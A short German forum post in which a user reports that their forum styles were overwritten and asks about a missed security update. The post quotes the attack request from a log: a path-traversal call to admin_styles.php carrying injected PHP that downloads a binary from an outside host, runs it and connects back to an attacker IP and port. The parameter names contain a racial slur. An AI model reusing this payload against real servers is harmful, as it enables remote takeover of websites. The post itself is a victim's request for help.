mir hat jemand die Styles überschrieben. Gibts da irgendein Sicherheitsupdate das ich verpennt hab?
Angriffscode hat glaub ich etwa so ausgesehen:
Code: Alles auswählen
Script: /admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=e4450f5874ea67ac64d1988c972dbf34&niggaip=82.57.74.92&niggaport=65000&nigga=$a=fopen("http://www.apaw.ca/images/nc4hk.swf","r");$b="";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen("/tmp/.sess_","w");fwrite($a,$b);fclose($a);chmod("/tmp/.sess_",0777);passthru("/tmp/.sess_%20".$_REQUEST[niggaip]."%20".$_REQUEST[niggaport]."%20");---chris
